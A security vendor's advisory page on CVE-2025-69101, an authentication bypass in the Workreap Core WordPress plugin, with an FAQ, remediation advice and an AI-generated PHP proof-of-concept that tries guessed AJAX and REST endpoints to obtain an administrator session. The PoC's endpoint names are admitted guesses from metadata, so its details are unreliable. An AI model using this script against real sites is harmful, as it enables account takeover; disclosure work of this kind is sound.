What is CVE-2025-69101?

CVE-2025-69101 is a critical authentication bypass vulnerability in the Workreap Core plugin for WordPress, affecting versions up to and including 3.4.0. This flaw allows unauthenticated attackers to authenticate as any registered user without proper identity verification.

How does the authentication bypass work?

The vulnerability allows attackers to send crafted requests to a vulnerable authentication endpoint, typically an AJAX handler. By providing a target user identifier without valid credentials, the plugin improperly establishes a session for that user, granting attackers access to their account.

Who is affected by this vulnerability?

Any WordPress site using the Workreap Core plugin version 3.4.0 or earlier is affected. Site administrators should check their plugin version and update if necessary to mitigate risks associated with this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the Workreap Core plugin and verify its version. If it is 3.4.0 or lower, your site is at risk.

What steps should I take to fix this issue?

To fix the vulnerability, update the Workreap Core plugin to the latest version that addresses this issue. Additionally, ensure that all authentication endpoints validate user permissions and require valid credentials before allowing user impersonation.

What does the CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates a critical vulnerability with severe implications. This score reflects the ease of exploitation, lack of required privileges, and the potential for complete compromise of user accounts and site integrity.

What are the practical risks of this vulnerability?

Successful exploitation allows attackers to gain full access to any user account, including administrators. This can lead to unauthorized changes to site content, settings, and sensitive data, potentially resulting in a complete site takeover.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted request to the vulnerable AJAX endpoint. It shows the assumption of user identity without proper verification, highlighting the ease of executing the attack.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Workreap Core plugin temporarily to prevent exploitation. Additionally, review user permissions and limit access to sensitive areas of your site until the vulnerability is resolved.

Are there any additional security measures I should implement?

In addition to updating the plugin, consider implementing security plugins that monitor for unauthorized access attempts, enforce strong authentication practices, and regularly audit user accounts for suspicious activity.

How can I stay informed about vulnerabilities like CVE-2025-69101?

Subscribe to security mailing lists, follow WordPress security blogs, and monitor the CVE database for updates on vulnerabilities affecting WordPress plugins. Regularly checking for plugin updates is also crucial for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69101: Workreap Core <= 3.4.0 – Authentication Bypass (workreap_core)

CVE ID CVE-2025-69101

Plugin workreap_core

Severity Critical (CVSS 9.8)

CWE 288

Vulnerable Version 3.4.0

Patched Version —

Disclosed January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69101 (metadata-based):
The Workreap Core plugin for WordPress, versions up to and including 3.4.0, contains an authentication bypass vulnerability. This flaw allows unauthenticated attackers to authenticate as any registered user without providing valid credentials. The CVSS 3.1 score of 9.8 (Critical) reflects the complete lack of required privileges, low attack complexity, and full impact on confidentiality, integrity, and availability.

Atomic Edge research indicates the root cause is CWE-288: Authentication Bypass Using an Alternate Path or Channel. This classification suggests the plugin provides an alternative authentication mechanism that lacks proper identity verification. The vulnerability likely exists in a custom authentication endpoint, AJAX handler, or REST API route that accepts user identifiers without validating the requester’s permission to assume that identity. This conclusion is inferred from the CWE classification and vulnerability description, as no source code diff is available for confirmation.

Exploitation involves sending crafted requests to a vulnerable endpoint that processes authentication requests. Based on WordPress plugin patterns, the attack vector is likely an AJAX handler at /wp-admin/admin-ajax.php with an action parameter containing ‘workreap’ or ‘workreap_core’. Attackers would send POST requests containing a target user identifier parameter (such as user_id, email, or username) without providing corresponding authentication credentials. The plugin then improperly establishes a session for the specified user.

Remediation requires implementing proper authentication checks on all user identity assumption functions. The plugin must verify that the requester has legitimate authorization to authenticate as the target user, typically by requiring valid credentials or a secure token. All authentication endpoints should validate session tokens or nonces and ensure the requesting user matches the target user being authenticated. WordPress capability checks (current_user_can) should also be applied where appropriate.

Successful exploitation grants attackers full access to any user account, including administrators. Attackers can perform all actions available to the compromised user: modify site content, change settings, install plugins, upload malicious files, access sensitive data, and delete information. This vulnerability enables complete site takeover and data compromise without requiring any prior authentication.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69101 - Workreap Core <= 3.4.0 - Authentication Bypass
<?php
/**
 * Proof of Concept for CVE-2025-69101
 * This script demonstrates authentication bypass in Workreap Core plugin.
 * Assumptions based on WordPress plugin patterns and CWE-288:
 * 1. The plugin exposes an AJAX endpoint for authentication/user switching
 * 2. The endpoint accepts a user identifier parameter without proper verification
 * 3. The endpoint returns a session cookie or sets WordPress authentication
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Common WordPress AJAX endpoint for plugin handlers
$ajax_endpoint = '/wp-admin/admin-ajax.php';

// The action parameter likely contains 'workreap' based on plugin slug
// Multiple possible action names are tested based on common patterns
$possible_actions = [
    'workreap_switch_user',
    'workreap_login_as',
    'workreap_authenticate',
    'workreap_core_auth',
    'workreap_impersonate'
];

// Target user to authenticate as (change to existing user ID, email, or username)
$target_user = 'admin'; // Could be user ID, email, or username

foreach ($possible_actions as $action) {
    echo "Testing action: $actionn";
    
    $ch = curl_init();
    
    $post_data = [
        'action' => $action,
        'user_id' => $target_user,      // Common parameter name
        'email' => $target_user,        // Alternative parameter
        'username' => $target_user,     // Alternative parameter
        'user' => $target_user          // Generic parameter
    ];
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . $ajax_endpoint,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $post_data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER => true,        // Capture headers to check for Set-Cookie
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => 'Atomic Edge Research PoC'
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $headers = substr($response, 0, $header_size);
    $body = substr($response, $header_size);
    
    curl_close($ch);
    
    // Check for signs of successful authentication
    if (strpos($headers, 'Set-Cookie: wordpress_logged_in') !== false ||
        strpos($headers, 'Set-Cookie: wp-settings') !== false ||
        strpos($body, 'success') !== false ||
        strpos($body, 'redirect') !== false) {
        echo "[SUCCESS] Possible authentication bypass via action: $actionn";
        echo "Response Headers:n$headersn";
        echo "Response Body (first 500 chars):n" . substr($body, 0, 500) . "n";
        break;
    } else {
        echo "[FAILED] Action $action did not appear to work (HTTP $http_code)n";
    }
}

// Alternative: Test REST API endpoint if AJAX fails
// Many plugins use REST API for authentication functions
$rest_endpoints = [
    '/wp-json/workreap/v1/auth',
    '/wp-json/workreap/v1/login',
    '/wp-json/workreap/v1/user/switch',
    '/wp-json/wp/v2/users/' . $target_user . '/session' // Generic pattern
];

echo "nTesting REST API endpoints...n";

foreach ($rest_endpoints as $endpoint) {
    echo "Testing endpoint: $endpointn";
    
    $ch = curl_init();
    
    $post_data = json_encode([
        'user_id' => $target_user,
        'email' => $target_user,
        'username' => $target_user
    ]);
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . $endpoint,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $post_data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER => [
            'Content-Type: application/json',
            'Content-Length: ' . strlen($post_data)
        ]
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    curl_close($ch);
    
    if ($http_code == 200 || $http_code == 201) {
        echo "[POSSIBLE] REST endpoint $endpoint returned success (HTTP $http_code)n";
        echo "Check response for authentication tokens or session data.n";
    }
}

echo "nPoC complete. If successful, the script may have obtained a session cookie.n";
echo "Validate by visiting $target_url/wp-admin/ with the captured cookies.n";
?>

Frequently Asked Questions

What is CVE-2025-69101?
Understanding the vulnerability
CVE-2025-69101 is a critical authentication bypass vulnerability in the Workreap Core plugin for WordPress, affecting versions up to and including 3.4.0. This flaw allows unauthenticated attackers to authenticate as any registered user without proper identity verification.
How does the authentication bypass work?
Mechanism of exploitation
The vulnerability allows attackers to send crafted requests to a vulnerable authentication endpoint, typically an AJAX handler. By providing a target user identifier without valid credentials, the plugin improperly establishes a session for that user, granting attackers access to their account.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Workreap Core plugin version 3.4.0 or earlier is affected. Site administrators should check their plugin version and update if necessary to mitigate risks associated with this vulnerability.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the Workreap Core plugin and verify its version. If it is 3.4.0 or lower, your site is at risk.
What steps should I take to fix this issue?
Mitigation and remediation
To fix the vulnerability, update the Workreap Core plugin to the latest version that addresses this issue. Additionally, ensure that all authentication endpoints validate user permissions and require valid credentials before allowing user impersonation.
What does the CVSS score of 9.8 indicate?
Understanding severity levels
A CVSS score of 9.8 indicates a critical vulnerability with severe implications. This score reflects the ease of exploitation, lack of required privileges, and the potential for complete compromise of user accounts and site integrity.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Successful exploitation allows attackers to gain full access to any user account, including administrators. This can lead to unauthorized changes to site content, settings, and sensitive data, potentially resulting in a complete site takeover.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of the exploit
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted request to the vulnerable AJAX endpoint. It shows the assumption of user identity without proper verification, highlighting the ease of executing the attack.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Workreap Core plugin temporarily to prevent exploitation. Additionally, review user permissions and limit access to sensitive areas of your site until the vulnerability is resolved.
Are there any additional security measures I should implement?
Enhancing overall site security
In addition to updating the plugin, consider implementing security plugins that monitor for unauthorized access attempts, enforce strong authentication practices, and regularly audit user accounts for suspicious activity.
How can I stay informed about vulnerabilities like CVE-2025-69101?
Keeping updated on security issues
Subscribe to security mailing lists, follow WordPress security blogs, and monitor the CVE database for updates on vulnerabilities affecting WordPress plugins. Regularly checking for plugin updates is also crucial for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations